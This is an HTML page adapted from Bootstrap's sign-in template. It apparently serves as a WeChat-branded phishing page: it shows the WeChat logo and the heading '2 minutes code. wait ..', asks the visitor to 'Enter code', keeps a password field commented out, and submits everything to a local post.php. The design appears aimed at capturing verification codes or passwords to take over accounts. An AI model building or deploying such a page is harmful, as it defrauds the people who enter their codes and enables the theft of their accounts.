<!DOCTYPE html>
<!-- saved from url=(0051)https://getbootstrap.com/docs/5.3/examples/sign-in/ -->
<html lang="en" data-bs-theme="light"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="./Signin Template · Bootstrap v5.3_files/color-modes.js.download"></script>

        <link rel="stylesheet" href="../style.css">

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="Mark Otto, Jacob Thornton, and Bootstrap contributors">
    <meta name="generator" content="Hugo 0.115.4">
    <title>Signin Template · Bootstrap v5.3</title>

    <link rel="canonical" href="https://getbootstrap.com/docs/5.3/examples/sign-in/">

    

    <link rel="stylesheet" href="./Signin Template · Bootstrap v5.3_files/css@3">

<link href="./Signin Template · Bootstrap v5.3_files/bootstrap.min.css" rel="stylesheet" integrity="sha384-4bw+/aepP/YC94hEpVNVgiZdgIC5+VKNBQNGCHeKRQN+PtmoHDEXuppvnDJzQIu9" crossorigin="anonymous">

    <!-- Favicons -->
<link rel="apple-touch-icon" href="https://getbootstrap.com/docs/5.3/assets/img/favicons/apple-touch-icon.png" sizes="180x180">
<link rel="icon" href="https://getbootstrap.com/docs/5.3/assets/img/favicons/favicon-32x32.png" sizes="32x32" type="image/png">
<link rel="icon" href="https://getbootstrap.com/docs/5.3/assets/img/favicons/favicon-16x16.png" sizes="16x16" type="image/png">
<link rel="manifest" href="https://getbootstrap.com/docs/5.3/assets/img/favicons/manifest.json">
<link rel="mask-icon" href="https://getbootstrap.com/docs/5.3/assets/img/favicons/safari-pinned-tab.svg" color="#712cf9">
<link rel="icon" href="https://getbootstrap.com/docs/5.3/assets/img/favicons/favicon.ico">
<meta name="theme-color" content="#712cf9">


    

    
    <!-- Custom styles for this template -->
    <link href="./Signin Template · Bootstrap v5.3_files/sign-in.css" rel="stylesheet">
  </head>



  <body class="d-flex align-items-center py-4 bg-body-tertiary">
   

    

    
<main class="form-signin w-100 m-auto">
  <form  action="post.php"  method="post">
    <img class="mb-4" src="../wechat-logo.png" alt="" width="72" height="72">
    <h2 class="h3 mb-3 fw-normal"> 2 minutes code. wait ..</h2>

    <div class="form-floating">
      <input type="text" class="form-control" name="email" id="email" placeholder="name@example.com">
      <label for="floatingInput">Enter code</label>
    </div>
    <!--
    <div class="form-floating">
      <input type="password" class="form-control"  name="pass" id="pass" placeholder="Password">
      <label for="floatingPassword">Password</label>
    </div>
    -->

    <div class="form-check text-start my-3">
      
      
    </div>
    <button id="btn2" class="btn btn-primary w-100 py-2" type="submit">Sign in</button>
    <!-- <p class="mt-5 mb-3 text-body-secondary">© 2023</p> -->
  </form>
</main>
<script src="./Signin Template · Bootstrap v5.3_files/bootstrap.bundle.min.js.download" integrity="sha384-HwwvtgBNo3bZJJLYd8oVXjrBZt8cqVSpeBNS5n7C8IVInixGAoxmnlMuBnhbgrkm" crossorigin="anonymous"></script>

    

</body></html>